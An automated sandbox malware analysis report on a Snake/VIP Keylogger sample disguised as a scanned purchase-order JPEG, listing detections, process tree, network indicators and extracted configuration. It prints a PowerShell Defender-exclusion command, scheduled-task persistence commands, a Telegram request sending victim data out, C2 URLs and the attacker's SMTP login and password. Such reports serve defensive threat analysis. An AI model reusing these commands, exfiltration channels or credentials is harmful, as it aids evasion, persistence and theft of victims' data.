Windows Analysis Report
Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe

Overview

General Information

Sample name: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
Analysis ID: 1541880
MD5: 52f14c343d0b2ec1426e775c6b6569ff
SHA1: 5c61b57a86c14de578f2425773f190da35be62e2
SHA256: 5994cf17202884f994b3e294fca7cd9c2847b6c98a0bdb5e65cf164f830197a9
Tags: exe, MassLogger, user-lowmal3

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe (PID: 5824 cmdline: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe" MD5: 52F14C343D0B2EC1426E775C6B6569FF)
    • powershell.exe (PID: 4268 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7200 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4548 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • HJnkiZjAPsec.exe (PID: 7260 cmdline: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe MD5: 52F14C343D0B2EC1426E775C6B6569FF)
    • schtasks.exe (PID: 7400 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpCB45.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • HJnkiZjAPsec.exe (PID: 7448 cmdline: "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe" MD5: 52F14C343D0B2EC1426E775C6B6569FF)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "skisubi@kafs.co.ug", "Password": "B24AM5D9X9F3ZPN", "Host": "mail.kafs.co.ug", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "skisubi@kafs.co.ug", "Password": "B24AM5D9X9F3ZPN", "Host": "mail.kafs.co.ug", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(5 of 26 entries shown)

Source | Rule | Description | Author | Strings
6.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.400000.0.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x3ad12:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x3a3b5:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x3a612:$a4: \Orbitum\User Data\Default\Login Data
  • 0x3aff1:$a5: \Kometa\User Data\Default\Login Data
8.2.HJnkiZjAPsec.exe.47369f0.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
8.2.HJnkiZjAPsec.exe.47369f0.3.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
8.2.HJnkiZjAPsec.exe.47369f0.3.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
8.2.HJnkiZjAPsec.exe.47369f0.3.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2b859:$a1: get_encryptedPassword
  • 0x2be05:$a2: get_encryptedUsername
  • 0x2b4be:$a3: get_timePasswordChanged
  • 0x2b5e3:$a4: get_passwordField
  • 0x2b86f:$a5: set_encryptedPassword
  • 0x2e5c9:$a6: get_passwords
  • 0x2e974:$a7: get_logins
  • 0x2e5b5:$a8: GetOutlookPasswords
  • 0x2df6e:$a9: StartKeylogger
  • 0x2e8b6:$a10: KeyLoggerEventArgs
  • 0x2e00e:$a11: KeyLoggerEventArgsEventHandler
(5 of 45 entries shown)

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ParentProcessId: 5824, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe", ProcessId: 4268, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpCB45.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpCB45.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe, ParentImage: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe, ParentProcessId: 7260, ParentProcessName: HJnkiZjAPsec.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpCB45.tmp", ProcessId: 7400, ProcessName: schtasks.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 104.243.33.38, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, Initiated: true, ProcessId: 1260, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49779
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ParentProcessId: 5824, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp", ProcessId: 4548, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ParentProcessId: 5824, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe", ProcessId: 4268, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ParentProcessId: 5824, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" /XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp", ProcessId: 4548, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-25T09:18:06.504984+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 188.114.97.3 | 443 | TCP
2024-10-25T09:18:09.405582+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 188.114.97.3 | 443 | TCP
2024-10-25T09:18:10.513519+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49747 | 188.114.97.3 | 443 | TCP
2024-10-25T09:18:10.896570+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 188.114.97.3 | 443 | TCP
2024-10-25T09:18:11.993731+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49751 | 188.114.97.3 | 443 | TCP
2024-10-25T09:18:12.481315+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49752 | 188.114.97.3 | 443 | TCP
2024-10-25T09:18:16.714838+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49761 | 188.114.97.3 | 443 | TCP
2024-10-25T09:18:18.216321+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49767 | 188.114.97.3 | 443 | TCP
2024-10-25T09:18:19.178788+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49771 | 188.114.97.3 | 443 | TCP
2024-10-25T09:18:21.689635+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49775 | 188.114.97.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-25T09:18:04.545506+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49735 | 193.122.130.0 | 80 | TCP
2024-10-25T09:18:05.889523+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49735 | 193.122.130.0 | 80 | TCP
2024-10-25T09:18:07.389273+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49740 | 193.122.130.0 | 80 | TCP
2024-10-25T09:18:08.186206+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49742 | 193.122.130.0 | 80 | TCP
2024-10-25T09:18:08.779937+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49743 | 193.122.130.0 | 80 | TCP
2024-10-25T09:18:09.889320+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49742 | 193.122.130.0 | 80 | TCP
2024-10-25T09:18:11.264267+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49749 | 193.122.130.0 | 80 | TCP


AV Detection

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe | Avira: detection malicious, Label: HEUR/AGEN.1304549
Source: 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "skisubi@kafs.co.ug", "Password": "B24AM5D9X9F3ZPN", "Host": "mail.kafs.co.ug", "Port": "587", "Version": "4.4"}
Source: 8.2.HJnkiZjAPsec.exe.4779410.2.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "skisubi@kafs.co.ug", "Password": "B24AM5D9X9F3ZPN", "Host": "mail.kafs.co.ug", "Port": "587"}
Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe | ReversingLabs: Detection: 50%
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe | Joe Sandbox ML: detected
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4d76750.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4cf2330.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.HJnkiZjAPsec.exe.4779410.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.HJnkiZjAPsec.exe.47369f0.3.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.4:49779 -> 104.243.33.38:587
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2025/10/2024%20/%2019:19:15%0D%0ACountry%20Name:%20United%20States%0D%0A[%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2025/10/2024%20/%2020:37:54%0D%0ACountry%20Name:%20United%20States%0D%0A[%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 193.122.130.0
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: RELIABLESITEUS
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49749 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49735 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49743 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49751 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49761 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49767 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49771 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49775 -> 188.114.97.3:443
                  Source: global trafficTCP traffic: 192.168.2.4:49779 -> 104.243.33.38:587
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
                  Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.0
                  Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.0
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1 | Host: reallyfreegeoip.org
                  Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2025/10/2024%20/%2019:19:15%0D%0ACountry%20Name:%20United%20States%0D%0A[%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                  Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                  Source: global traffic | DNS traffic detected: DNS query: mail.kafs.co.ug
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 25 Oct 2024 07:18:19 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 25 Oct 2024 07:18:24 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002CAB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4132369730.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4132447999.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1733478686.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 00000008.00000002.1781171636.00000000046A7000.00000004.00000800.00020000.00000000.sdmp, HJnkiZjAPsec.exe, 0000000B.00000002.4128482963.0000000000432000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
